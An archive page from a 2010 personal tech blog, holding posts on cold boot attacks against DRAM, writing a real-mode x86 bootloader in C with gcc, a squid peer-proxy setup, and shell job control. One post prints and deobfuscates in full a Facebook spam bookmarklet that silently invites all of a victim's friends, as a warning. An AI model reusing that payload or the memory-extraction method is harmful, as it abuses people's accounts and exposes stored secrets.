dc0d32: 2010

Wednesday, June 16, 2010

Cold boot attack

How safe and secure is your data when stored on a PC/workstation or a laptop? Say you also have whole disc/volume encryption, maybe activated by a USB key. Even then, how secure is your data?

If the computer is turned on when it physically falls in hands of the attacker, you might be at risk even with whole disc encryption enabled and the screen locked requiring your (non compromised) password. This is especially true for portable machines like laptops and net-books. There are many possible attacks, we will look into a specific one called cold boot attack in this post.

Something about memory

Chances are that your main memory is DRAM technology based, which includes popular ones such as SDRAM, DDRx and even the VRAM in most cases. As it is widely considered to be volatile type of memory, we are under the impression that it loses the stored contents after power is cut off. Sadly the contents are not lost instantaneously, but they decay/degrade gradually due to the way DRAM stores data.

Figure 0 : A DRAM Cell

Without going into the details of the dynamic logic, it suffices to say that the bit is stored as charge on a capacitor connected to the rest of the circuit with a transistor which acts like a switch. Simply put, if the capacitor has charge above a certain level, we interpret bit value 1, and 0 otherwise. (each CAS or bit line like the one shown in Figure 0 is actually a set of two bit lines, +ve and -ve which are connected to alternate cells/FETs in the row. When reading, after both bit lines have been precharged, RAS is activated and the sense amplifier kicks in. Due to positive feedback it can detect the slight charge difference between +ve and -ve bit lines.)

Capacitors are not perfect. They lose charge over time as leakage current. Thus, each DRAM cell has to be `refreshed' frequently enough to retain content. Even though manufacturers usually recommend the DRAM be refreshed at least every 64ms (to ensure that there is no data corruption), well built DRAMs have a retention period that is significantly greater than the suggested refresh period. It goes without saying that some bits do corrupt, but the rate at which they do is pretty low when you put 64ms in perspective. This is true even after turning the power off entirely.

How does this concern me?

Well, the significantly long retention period of main memory is a security hole. If a computer is physically compromised when it is powered on, the attacker can read most of the contents stored on your main memory. The main memory includes wealth of information : any user names and passwords that are `cached' by applications, encryption keys for hard drive/volume encryption as well as SSL private keys for active connections, and (maybe partial) contents of any file that is or was open in recent past (as after closing the file, most operating systems do not clear the corresponding memory pages used as block cache, for obvious performance reasons), including portions of deleted files at times as well. This is assuming the machine is locked in some sense, and the unlocking password is not known to the attacker.

At room temperature, the DRAM holds on to the stored bits if the power down/up cycle completes in 64ms. Errors are introduced as powered-off period increases. The period during which no or very few bits corrupt can be significantly increased if the DRAM modules are cooled to near or beyond 0 degree C. Such `cold' modules can then be inserted into another compatible machine and their contents dumped for detailed analysis. I believe that the reason for extended retention is because as the capacitors usually have Aluminum oxide as dielectric whose leakage current reduces as temperature reduces.

A very good paper from Princeton University discussing how to detect keys in the dumps is here. They claim to have broken almost every hard drive encryption solution there is :(. They also provide software to dump memory contents on a portable drive.

This technique is important for forensics/law enforcement as well. During a bust of a computer crime suspect, memory dumps of the machines are extremely important to support the case. This technique allows the law enforcers to get the system state or a snapshot as it was at the time of the bust even without the suspects' co-operation.

Note that the technique is ineffective against other types of memory, for example bistable latched SRAM. So in case you are wondering if you could get something out of the hard drive caches or something from the buffers of a compromised router, you are out of luck!

Does it really work? Can I see it working on my machine?

Sure!

I've created a simple RAM browser (kernel) named `RAMBO' (download source) which, as the name says, can be used to browse the RAM contents after a simulated theft and cold reboot. You can choose to be super-realistic, pulling out the cord of your desktop or pulling out the battery of your laptop and putting it back in a jiffy. If you are worried about pulling the cord while windows/*NIX runs, you can choose to load a file to certain RAM location, reboot and check if the contents are readable after reboot. The program is to be loaded from a multiboot compliant bootloader such as GRUB. It does not touch any other piece of hardware than the processor, memory and keyboard, so rest assured that you will not have a corrupt disc or fried electronics. In case you do not have such a loader installed already, you can install the loader on a floppy or a USB stick and copy the program to it so that you can load it when you boot from USB/floppy. The README provides more info on how to use it.

Tuesday, June 15, 2010

Real mode in C with gcc : writing a bootloader

Usually the x86 boot loader is written in assembler. We will be exploring the possibility of writing one in C language (as much as possible) compiled with gcc, and runs in real mode. Note that you can also use the 16 bit bcc or TurboC compiler, but we will be focusing on gcc in this post. Most open source kernels are compiled with gcc, and it makes sense to write C bootloader with gcc instead of bcc as you get a much cleaner toolchain :)

As of today (20100614), gcc 4.4.4 officially only emits code for protected/long mode and does not support the real mode natively (this may change in future).

Also note that we will not discuss the very fundamentals of booting. This article is fairly advanced and assumes that you know what it takes to write a simple boot-loader in assembler. It is also expected that you know how to write gcc inline assembly. Not everything can be done in C!

getting the tool-chain working

.code16gcc

As we will be running in 16 bit real mode, this tells gas that the assembler was generated by gcc and is intended to be run in real mode. With this directive, gas automatically adds addr32 prefix wherever required. For each C file which contains code to be run in real mode, this directive should be present at the top of effectively generated assembler code. This can be ensured by defining in a header and including it before any other.


#ifndef _CODE16GCC_H_
#define _CODE16GCC_H_
__asm__(".code16gcc\n");
#endif

This is great for bootloaders as well as parts of kernel that must run in real mode but are desired written in C instead of asm. In my opinion C code is a lot easier to debug and maintain than asm code, at expense of code size and performance at times.

Special linking

As bootloader is supposed to run at physical 0x7C00, we need to tell that to linker. The mbr/vbr should end with the proper boot signature 0xaa55.
All this can be taken care of by a simple linker script.


ENTRY(main);
SECTIONS
{
    . = 0x7C00;
    .text : AT(0x7C00)
    {
        _text = .;
        *(.text);
        _text_end = .;
    }
    .data :
    {
        _data = .;
        *(.bss);
        *(.bss*);
        *(.data);
        *(.rodata*);
        *(COMMON)
        _data_end = .;
    }
    .sig : AT(0x7DFE)
    {
        SHORT(0xaa55);
    }
    /DISCARD/ :
    {
        *(.note*);
        *(.iplt*);
        *(.igot*);
        *(.rel*);
        *(.comment);
/* add any unwanted sections spewed out by your version of gcc and flags here */
    }
}

gcc emits elf binaries with sections, whereas a bootloader is a monolithic plain binary with no sections. Conversion from elf to binary can be done as follows:


$ objcopy -O binary vbr.elf vbr.bin

The code

With the toolchain set up, we can start writing our hello world bootloader!
vbr.c (the only source file) looks something like this:


/*
 * A simple bootloader skeleton for x86, using gcc.
 *
 * Prashant Borole (boroleprashant at Google mail)
 * */

/* XXX these must be at top */
#include "code16gcc.h"
__asm__ ("jmpl  $0, $main\n");


#define __NOINLINE  __attribute__((noinline))
#define __REGPARM   __attribute__ ((regparm(3)))
#define __NORETURN  __attribute__((noreturn))

/* BIOS interrupts must be done with inline assembly */
void    __NOINLINE __REGPARM print(const char   *s){
        while(*s){
                __asm__ __volatile__ ("int  $0x10" : : "a"(0x0E00 | *s), "b"(7));
                s++;
        }
}
/* and for everything else you can use C! Be it traversing the filesystem, or verifying the kernel image etc.*/

void __NORETURN main(){
    print("woo hoo!\r\n:)");
    while(1);
}

compile it as


$ gcc -c -g -Os -march=i686 -ffreestanding -Wall -Werror -I. -o vbr.o vbr.c
$ ld -static -Tlinker.ld -nostdlib --nmagic -o vbr.elf vbr.o
$ objcopy -O binary vbr.elf vbr.bin

and that should have created vbr.elf file (which you can use as a symbols file with gdb for source level debugging the vbr with gdbstub and qemu/bochs) as well as 512 byte vbr.bin. To test it, first create a dummy 1.44M floppy image, and overwrite it's mbr by vbr.bin with dd.


$ dd if=/dev/zero of=floppy.img bs=1024 count=1440
$ dd if=vbr.bin of=floppy.img bs=1 count=512 conv=notrunc

and now we are ready to test it out :D


$ qemu -fda floppy.img -boot a

and you should see the message!

Once you get to this stage, you are pretty much set with respect to the tooling itself. Now you can go ahead and write code to read the filesystem, search for next stage or kernel and pass control to it.

Here is a simple example of a floppy boot record with no filesystem, and the next stage or kernel written to the floppy immediately after the boot record. The next image LMA and entry are fixed in a bunch of macros. It simply reads the image starting one sector after boot record and passes control to it. There are many obvious holes, which I left open for sake of brevity.


/*
 * A simple bootloader skeleton for x86, using gcc.
 *
 * Prashant Borole (boroleprashant at Google mail)
 * */

/* XXX these must be at top */
#include "code16gcc.h"
__asm__ ("jmpl  $0, $main\n");


#define __NOINLINE  __attribute__((noinline))
#define __REGPARM   __attribute__ ((regparm(3)))
#define __PACKED    __attribute__((packed))
#define __NORETURN  __attribute__((noreturn))

#define IMAGE_SIZE  8192
#define BLOCK_SIZE  512
#define IMAGE_LMA   0x8000
#define IMAGE_ENTRY 0x800c

/* BIOS interrupts must be done with inline assembly */
void    __NOINLINE __REGPARM print(const char   *s){
        while(*s){
                __asm__ __volatile__ ("int  $0x10" : : "a"(0x0E00 | *s), "b"(7));
                s++;
        }
}

#if 0
/* use this for the HD/USB/Optical boot sector */
typedef struct __PACKED TAGaddress_packet_t{
    char                size;
    char                :8;
    unsigned short      blocks;
    unsigned short      buffer_offset;
    unsigned short      buffer_segment;
    unsigned long long  lba;
    unsigned long long  flat_buffer;
}address_packet_t ;

int __REGPARM lba_read(const void   *buffer, unsigned int   lba, unsigned short blocks, unsigned char   bios_drive){
        int i;
        unsigned short  failed = 0;
        address_packet_t    packet = {.size = sizeof(address_packet_t), .blocks = blocks, .buffer_offset = 0xFFFF, .buffer_segment = 0xFFFF, .lba = lba, .flat_buffer = (unsigned long)buffer};
        for(i = 0; i < 3; i++){
                packet.blocks = blocks;
                __asm__ __volatile__ (
                                "movw   $0, %0\n"
                                "int    $0x13\n"
                                "setcb  %0\n"
                                :"=m"(failed) : "a"(0x4200), "d"(bios_drive), "S"(&packet) : "cc" );
                /* do something with the error_code */
                if(!failed)
                        break;
        }
        return failed;
}
#else
/* use for floppy, or as a fallback */
typedef struct {
        unsigned char   spt;
        unsigned char   numh;
}drive_params_t;

int __REGPARM __NOINLINE get_drive_params(drive_params_t    *p, unsigned char   bios_drive){
        unsigned short  failed = 0;
        unsigned short  tmp1, tmp2;
        __asm__ __volatile__
            (
             "movw  $0, %0\n"
             "int   $0x13\n"
             "setcb %0\n"
             : "=m"(failed), "=c"(tmp1), "=d"(tmp2)
             : "a"(0x0800), "d"(bios_drive), "D"(0)
             : "cc", "bx"
            );
        if(failed)
                return failed;
        p->spt = tmp1 & 0x3F;
        p->numh = tmp2 >> 8;
        return failed;
}

int __REGPARM __NOINLINE lba_read(const void    *buffer, unsigned int   lba, unsigned char  blocks, unsigned char   bios_drive, drive_params_t  *p){
        unsigned char   c, h, s;
        c = lba / (p->numh * p->spt);
        unsigned short  t = lba % (p->numh * p->spt);
        h = t / p->spt;
        s = (t % p->spt) + 1;
        unsigned char   failed = 0;
        unsigned char   num_blocks_transferred = 0;
        __asm__ __volatile__
            (
             "movw  $0, %0\n"
             "int   $0x13\n"
             "setcb %0"
             : "=m"(failed), "=a"(num_blocks_transferred)
             : "a"(0x0200 | blocks), "c"((s << 8) | s), "d"((h << 8) | bios_drive), "b"(buffer)
            );
        return failed || (num_blocks_transferred != blocks);
}
#endif

/* and for everything else you can use C! Be it traversing the filesystem, or verifying the kernel image etc.*/

void __NORETURN main(){
        unsigned char   bios_drive = 0;
        __asm__ __volatile__("movb  %%dl, %0" : "=r"(bios_drive));      /* the BIOS drive number of the device we booted from is passed in dl register */

        drive_params_t  p = {};
        get_drive_params(&p, bios_drive);

        void    *buff = (void*)IMAGE_LMA;
        unsigned short  num_blocks = ((IMAGE_SIZE / BLOCK_SIZE) + (IMAGE_SIZE % BLOCK_SIZE == 0 ? 0 : 1));
        if(lba_read(buff, 1, num_blocks, bios_drive, &p) != 0){
            print("read error :(\r\n");
            while(1);
        }
        print("Running next image...\r\n");
        void*   e = (void*)IMAGE_ENTRY;
        __asm__ __volatile__("" : : "d"(bios_drive));
        goto    *e;
}

removing __NOINLINE may result in even smaller code in this case. I had it in place so that I could figure out what was happening.

Concluding remarks

C in no way matches the code size and performance of hand tuned size/speed optimized assembler. Also, because of an extra byte (0x66, 0x67) wasted (in addr32) with almost every instruction, it is highly unlikely that you can cram up the same amount of functionality as assembler.

Global and static variables, initialized as well as uninitialized, can quickly fill those precious 446 bytes. Changing them to local and passing around instead may increase or decrease size; there is no thumb rule and it has to be worked out on per case basis. Same goes for function in-lining.

You also need to be extremely careful with various gcc optimization flags. For example, if you have a loop in your code whose number of iterations are small and deducible at compile time, and the loop body is relatively small (even 20 bytes), with default -Os, gcc will unroll that loop. If the loop is not unrolled (-fno-tree-loop-optimize), you might be able to shave off big chunk of bytes there. Same holds true for frame setups on i386 - you may want to get rid of them whenever not required using -fomit-frame-pointer. Moral of the story : you need to be extra careful with gcc flags as well as version update. This is not much of an issue for other real mode modules of the kernel where size is not of this prime importance.

Also, you must be very cautious with assembler warnings when compiling with .code16gcc. Truncation is common. It is a very good idea to use --save-temp and analyze the assembler code generated from your C and inline assembly. Always take care not to mess with the C calling convention in inline assembly and meticulously check and update the clobber list for inline assembly doing BIOS or APM calls (but you already knew it, right?).

It is likely that you want to switch to protected/long mode as early as possible, though. Even then, I still think that maintainability wins over asm's size/speed in case of a bootloader as well as the real mode portions of the kernel.

It would be interesting if someone could try this with c++/java/fortran. Please let me know if you do!

Saturday, May 08, 2010

How not to look like a fool on facebook

I did it already. Warning you so that you don't.

There is a full blown army of apps on Facebook which spam your friends with recommendations without your consent. Going by Facebook's policies, these apps are spam, and you should report them as soon as possible.

They are named in interesting ways. When you click the link, it first shows a button.
Let us take an example of 'Is this dog ugly?'.

As it came from a credible friend, you go ahead and click the button,

and do as you are told to do so, expecting some image with fancy javascript animation.

you paste the code and hit enter, and wait for it.
Before you know it, it has sent invitations to your friends, and you end up looking like a fool!

This is how it works :

the script you copy looks something like this:

javascript:(function(){a = "app120196878004524_jop"; b = "app120196878004524_jode"; ifc = "app120196878004524_ifc"; ifo = "app120196878004524_ifo"; mw = "app120196878004524_mwrapper"; function ff(p, a, c, k, e, r) { e = function (c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)); }; if (!"".replace(/^/, String)) { while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1; } while (c--) { if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);} } return p; } str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {})})();

With slightly better formatting, it looks like

a='app120196878004524_jop';
b='app120196878004524_jode';
ifc='app120196878004524_ifc';
ifo='app120196878004524_ifo';
mw='app120196878004524_mwrapper';
eval(
 function(p,a,c,k,e,r){
  e=function(c){
   return
      (c35?String.fromCharCode(c+29):c.toString(36))
  };
  if(!''.replace(/^/,String)){
   while(c--)
    r[e(c)]=k[c]||e(c);
   k=[function(e){return r[e]}];
   e=function(){
    return'\\w+'
   };
   c=1
  };
  while(c--)
   if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
  return p
 }
 ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{})
);

now, let us drop the last parentheses () and check what code this actually executes:

a = "app120196878004524_jop";
b = "app120196878004524_jode";
ifc = "app120196878004524_ifc";
ifo = "app120196878004524_ifo";
mw = "app120196878004524_mwrapper";
function ff(p, a, c, k, e, r) {
 e = function (c) {
  return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
 };
 if (!"".replace(/^/, String)) {
  while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1;
 }
 while (c--) {
  if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);}
 }
 return p;
}
str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {});

// and lets print the string that gets evaluated
print(str);

which, when executed with `js' gives output

var _0x95ea=[ "\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
"\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x68\x69\x64\x64\x65\x6E",
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65",
"\x73\x75\x67\x67\x65\x73\x74",
"\x6C\x69\x6B\x65\x6D\x65",
"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
"\x63\x6C\x69\x63\x6B",
"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
d=document;
d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
s=d[_0x95ea[2]](_0x95ea[6]);
m=d[_0x95ea[2]](_0x95ea[7]);
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);
setTimeout(function(){fs[_0x95ea[13]]()},5000);
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

note that executing print(_0x95ea); gives

visibility,style,getElementById,hidden,innerHTML,value,suggest,likeme,MouseEvents,createEvent,click,initEvent,dispatchEvent,select_all,sgm_invite_form,/ajax/social_graph/invite_dialog.php,submitDialog

so, the final code that gets executed is

document["getElementById"]("app120196878004524_mwrapper")["style"]["visibility"]="hidden";
document["getElementById"]("app120196878004524_jop")["innerHTML"]=document["getElementById"]("app120196878004524_jode")["value"];
s=document["getElementById"]("suggest");
m=document["getElementById"]("likeme");
c=document["createEvent"]("MouseEvents");
c["initEvent"]("click",true,true);
s["dispatchEvent"](c);
setTimeout(function(){fs["select_all"]()},5000);
setTimeout(function(){SocialGraphManager["submitDialog"]("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000);
setTimeout(function(){m["dispatchEvent"](c);document["getElementById"]("app120196878004524_ifo")["innerHTML"]=document["getElementById"]("app120196878004524_ifc")["value"]},5000);

Essentially the script automatically brings up `suggest to friends' window listing all friends, selects all and submits the invitation request on your behalf (using MouseEvents with setTimeout).

Note that the code template is same for all these kind of applications. Just the application specific IDs ("app120196878004524_jop" etc.) change.

In general, whenever someone asks you to execute some piece of javascript in address bar, consider it harmful. In this case they do not steal your identity, so no worries; but you have every reason to believe the next such application will.

Take care.

Wednesday, May 05, 2010

Authenticated corporate proxy woes - Local squid cache peer proxy

How many times has it happened at school or work that the software you want to use needs to connect to the Internet can not get through the stupid proxy? I know I've suffered a lot due to this. Moreover, looks like companies such as Nokia, Ubisoft etc. do not really care about people behind authenticated proxies either. It is really surprising (and annoying) to see so many nice software without support for authenticated proxies. That also includes the all new `awesome' (sarcasm intended) chat client that comes by default in Ubuntu called Empathy.

Or are you otherwise pissed off because you have to type your proxy authentication in all those different places? There are KDE settings, GNOME settings, (e)links, subversion config, yum/apt configuration, entering password a thousand times when firefox(pre-3.6) tries to find updates after restart and reopen all those tabs etc. etc., or IE settings for windows users, the "netsh winhttp set proxy" method to get your Windows 7 updates through the proxy?

Yes. Very, very annoying.

What if you could delegate the authentication to some other service running on and strictly for your computer only? How about your own proxy server running on your machine that delegates requests to your organization's proxy with proper authentication so that you no longer have to worry about authentication?

Running local squid

The basic idea is this : we run a local instance of squid which runs as a peer proxy to the organization's proxy, with authentication on your behalf. This means that now you can set proxy as localhost and connect - the authentication will be taken care of by local squid copy. Not just that, it also reduces some load on your organization's proxy, as it also caches (static by default) content.

Just append these lines to your /etc/squid/squid.conf

cache_peer proxy.addr parent [proxy.addr proxy port] [proxy.addr icp port]  
default no-query login=[login_name]:[pass]

# to bypass the proxy for local or LAN access
acl local_domain dstdomain *.local.domain
acl local_nat dst 10.0.0.0/8
always_direct allow local_domain
always_direct allow local_nat

# everything else must pass through the parent. No direct access allowed.
never_direct allow all

Let us dissect the config:

cache_peer proxy.addr tells squid to work as a peer proxy to your organization's proxy.
parent tells squid that proxy.addr is one of it's parents in the cache hierarchy.
[my.proxy.address proxy port] the port on which organization's proxy accepts connections.
[my.proxy.address icp port] the port on which organization's proxy listens for ICP requests.

Now the `option'

no-query in case your proxy does not provide ICP support, or you do not want to enable it, providing this clause will stop our squid from sending ICP requests and reduce unnecessary delays.
login=[login_name]:[pass] self explanatory.

Note that you need to take care of forwarding any special ports your applications might need.

This method works only for basic authentication (base64 encode method).

There are some obvious security concerns. First, your password is stored in plaintext - make sure that non-root users have *no* permissions on /etc/squid/squid.conf. Also make sure that this proxy accepts connections only from local host. There still is a security hole, in that in case someone logs into your machine as a normal or guest user, even he can use your connection.

This method works on all UNIces, Linux as well as Windows.

Wednesday, April 14, 2010

Continue running a non nohup-ed command after logout (no SIGHUP)

Many times it happens that you start a command that takes fairly long time to complete, and before it ends, you must log out for some reason - maybe the network will go down soon or you do not want to keep staring at the screen till it completes, or you just don't want to keep that terminal around.

A bit of shell behaviour for the uninformed. When you launch a command in a shell, the new process is created by fork()ing the current shell and immediately exec()ing the command executable/binary, which means the new process is a child of the shell process. You can stop the running process and keep it running in background as

% java some.long.running.application
{java program spits out something}
{hit ^z}
^Z
zsh: suspended  java some.long.running.application
% bg
[1]  + continued  java some.long.running.application

or you can start it in background as

% java some.long.running.application &
[1]  1001
{java program spits out something}

of course you can bring these jobs in foreground any time you want

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% fg %2 {bash users must drop the %}
[2]    running    java some.long.running.application
{java program spits out something}

Now you want to log out. The moment you log out of the terminal, the shell process sends SIGHUP signal to all running children and SIGCONT->SIGHUP for all stopped children. The default behaviour of an application after receiving SIGHUP is to exit. Any applications - foreground, as well as background, that were started from this shell are killed. We want our application to survive after logout.

The textbook way of doing this is to start the command with `nohup' as

% nohup java some.long.running.application &
[1] 1001
% logout

or the subshell trick :

% (java some.long.running.application &)
% {prompt returns, java disowned}
{java program spits out something}

zsh users can do it as :

% java some.long.running.application &!
% {prompt returns, java disowned}
{java program spits out something}

Or use the good old screen (my favorite)!

Unfortunately you did not start the process with nohup or subshell trick, and say the process can not be restarted because of some reason or it has done significant work already.

What if we could tell the shell not to send SIGHUP to a particular child?
`disown' command lets you do just that! :D

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% disown %2 {bash users must drop the %, also bashers can add -h option}
{java program spits out something}

This tells the shell not to send SIGHUP to our precious java process. And you'd think you can now happily log out with java process still running.

Well, not quite. Say the shell has pid 1000 and java process has pid 1001, then

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

% ls -l /proc/1001/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

Which means process 1001 uses terminal /dev/pts/1 as it's stdin, stdout and stderr. Even if we disown the java process, when the shell quits, terminal device /dev/pts/1 will not be available, and hence next read or write by java process to any of stdin/stdout/stderr will probably result in an abort. Even if it does not abort, you might want to capture stdout and stderr of the program somewhere to a file maybe, and possibly feed some file to it as input. That is not possible as

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1 (deleted)
lrwx------. {...} 1 -> /dev/pts/1 (deleted)
lrwx------. {...} 2 -> /dev/pts/1 (deleted)

Sad, isn't it?

Not quite!

